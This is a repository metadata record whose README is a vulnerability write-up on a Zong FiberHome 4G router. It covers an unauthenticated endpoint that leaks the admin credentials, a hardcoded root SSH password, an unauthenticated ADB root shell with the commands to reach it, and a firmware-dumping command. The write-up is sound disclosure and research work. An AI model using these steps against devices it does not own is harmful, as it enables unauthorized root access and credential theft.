{"id":18939909,"url":"https://github.com/abdullah2993/zong-wifi","last_synced_at":"2025-06-20T13:34:08.353Z","repository":{"id":83983991,"uuid":"140077041","full_name":"abdullah2993/zong-wifi","owner":"abdullah2993","description":null,"archived":false,"fork":false,"pushed_at":"2019-11-08T19:15:42.000Z","size":1056,"stargazers_count":7,"open_issues_count":4,"forks_count":0,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-05-25T09:40:37.221Z","etag":null,"topics":["exploit","hack","unlock","unlocker","vulnerability","zong"],"latest_commit_sha":null,"homepage":null,"language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/abdullah2993.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2018-07-07T11:05:40.000Z","updated_at":"2023-02-05T04:26:11.000Z","dependencies_parsed_at":null,"dependency_job_id":"c0d4d2ce-3d2e-48a4-a601-608e479f0ca7","html_url":"https://github.com/abdullah2993/zong-wifi","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/abdullah2993/zong-wifi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/abdullah2993%2Fzong-wifi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/abdullah2993%2Fzong-wifi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/abdullah2993%2Fzong-wifi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/abdullah2993%2Fzong-wifi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/ow
ners/abdullah2993","download_url":"https://codeload.github.com/abdullah2993/zong-wifi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/abdullah2993%2Fzong-wifi/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":260953383,"owners_count":23088030,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["exploit","hack","unlock","unlocker","vulnerability","zong"],"created_at":"2024-11-08T12:19:22.926Z","updated_at":"2025-06-20T13:34:03.343Z","avatar_url":"https://github.com/abdullah2993.png","language":"JavaScript","funding_links":[],"categories":[],"sub_categories":[],"readme":"\n# Zong FiberHome 4G Device\n\n ## Vulnerabilities and Exploits\n Although the device uses a weird authentication method, it is nothing more than a gimmick used \n by the UI code to give an illusion of authentication.\n All the endpoints are accessible directly without authentication and the best part of it all is you can\n use the [`admin`](http://192.168.8.1/xml_action.cgi?method=get\u0026module=duster\u0026file=admin) endpoint to get the username and password for the router.\n\nThe output of the `admin` endpoint is something like\n```\n\u003c?xml version=\"1.0\" 
encoding=\"US-ASCII\"?\u003e\n\u003cRGW\u003e\n\t\u003cmanagement\u003e\n\t\t\u003crouter_username\u003eadmin\u003c/router_username\u003e\n\t\t\u003crouter_password\u003eadmin\u003c/router_password\u003e\n\t\t\u003cweb_wlan_enable/\u003e\n\t\t\u003chttpd_port/\u003e\n\t\t\u003csyslogd_enable/\u003e\n\t\t\u003cweb_wan_enable/\u003e\n\t\t\u003csyslogd_rem_ip/\u003e\n\t\t\u003cturbo_mode/\u003e\n        \u003ccustomer/\u003e\n\t\u003c/management\u003e\n\u003c/RGW\u003e\n```\n\nThe vulnerability explained above is [well known and quite old](https://github.com/OsamaMahmood/Zong-router-exploit), but wait, there's more! To my knowledge (not sure though), the `Fiber Home` version of the `Zong` devices is unlocked by default, but if yours is not, you can use a simple trick to get super user access and unlock\nthe device directly from the `Admin Panel`. All you have to do is log in to your router and change the default **username** from `admin` to `root`, and voila, you can see a new tab named `Advance` in `Settings` which provides options to unlock the device, as shown below.\n\n![Advance Settings](/zong_adv_settings.PNG?raw=true \"Advance Settings\")\n\n## Analysis\nIt gets more interesting once you do a port scan of the device. 
The port scan shows the following ports to be open:\n - 22 - SSH\n - 53 - DNS\n - 80 - HTTP (Admin Panel)\n - 3020 - Unknown\n - 3021 - Unknown\n - 5555 - ADB\n\n### Port 22\nYou can ssh into the device as `root` using password `oelinux123`\n\n### Port 53 and 80\nThese ports are standard `DNS` and `HTTP` ports\n\n#### Endpoints\n\nBase URL: `/xml_action.cgi?method=get\u0026module=duster\u0026file=[name]`\nKnown file names are:\n - admin\n - app_fun_support_list\n - battery_charge\n - custom_fw\n - detailed_log\n - dns\n - download_local_upgrade\n - lan\n - lock_cell_clear\n - message\n - message_drafts\n - message_outbox\n - message_set\n - message_state\n - net_advace_set\n - ntp_server\n - pin_puk\n - reset\n - restore_defaults\n - shutdown\n - status1\n - time_setting\n - traffic_excess_set\n - uapxb_wlan_basic_settings\n - uapxb_wlan_security_settings\n - upgrade_info\n - ussd_business\n - wan\n - wan_choose_net\n - wan_ip\n - wlan_auto_setting\n\n### Port 3020\nPort 3020 is interesting: once you connect to it, it immediately sends the banner `ms_version:1` and then appears to send/receive nothing, but if you stay connected it starts sending packets with `JSON` payloads \"periodically\", which appear to be 4-byte length-prefixed. See the sample payloads below.\n\n```\n{\n\t\"operate\": \"report\",\n\t\"service_name\": \"modem\",\n\t\"signal_strength\": 2\n}\n```\n```\n{\n\t\"operate\": \"report\",\n\t\"service_name\": \"modem\",\n\t\"signal_strength_v1\": [\n\t\t{\n\t\t\t\"cdma_dbm\": 0,\n\t\t\t\"evdo_dbm\": -125,\n\t\t\t\"gsm_signal_strength\": 0,\n\t\t\t\"lte_rsrp\": -112,\n\t\t\t\"operator_type\": 2,\n\t\t\t\"tds_signal_strength\": 0,\n\t\t\t\"wcdma_signal_strength\": 0\n\t\t}\n\t]\n}\n```\n\n### Port 3021\nThis port lets you connect to it and keeps the connection open as long as you don't send anything, but as soon as you send something it immediately disconnects; it possibly expects some kind of pattern IMO (these kinds of ports were found on other 
routers too)\n\n### Port 5555\nThis port runs an unauthenticated `adb daemon`, so you can easily connect to it using `adb` and get shell access as follows:\n```\nadb connect 192.168.8.1:5555\nadb shell\n```\nYou will get access as the root user, so you can pretty much do anything you want.\n\n### Dumping Image\nYou can list the flash partitions using:\n```\ncat /proc/mtd\n\nOutput:\n\ndev:    size   erasesize  name\nmtd0: 00140000 00020000 \"sbl\"\nmtd1: 00140000 00020000 \"mibib\"\nmtd2: 00b00000 00020000 \"efs2\"\nmtd3: 00360000 00020000 \"sdi\"\nmtd4: 00360000 00020000 \"tz\"\nmtd5: 000c0000 00020000 \"mba\"\nmtd6: 00360000 00020000 \"rpm\"\nmtd7: 031e0000 00020000 \"qdsp\"\nmtd8: 000e0000 00020000 \"appsbl\"\nmtd9: 00800000 00020000 \"apps\"\nmtd10: 00040000 00020000 \"scrub\"\nmtd11: 04a80000 00020000 \"cache\"\nmtd12: 00160000 00020000 \"misc\"\nmtd13: 00560000 00020000 \"cdrom\"\nmtd14: 002e0000 00020000 \"logo\"\nmtd15: 00800000 00020000 \"recovery\"\nmtd16: 00100000 00020000 \"fota\"\nmtd17: 01080000 00020000 \"recoveryfs\"\nmtd18: 01080000 00020000 \"system\"\nmtd19: 12e80000 00020000 \"userdata\"\n```\nYou can just `cat` the device and pipe the data to a file, e.g. `ssh root@192.168.8.1 \"cat /dev/mtd18\" \u003e system.img`, to get the system image.\n\n### Filesystem\nIt's just a Linux filesystem; fun stuff can be found in `/usr/mifi/`. Some of the configurations are also stored in `sqlite 3` databases and can be found in `/usr/data/`.\n\n## Credits\nThanks to [IMExperts](https://github.com/IMExperts) for providing the `ssh` password as well as mentioning that port `5555` is running `adb`\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fabdullah2993%2Fzong-wifi","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fabdullah2993%2Fzong-wifi","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fabdullah2993%2Fzong-wifi/lists"}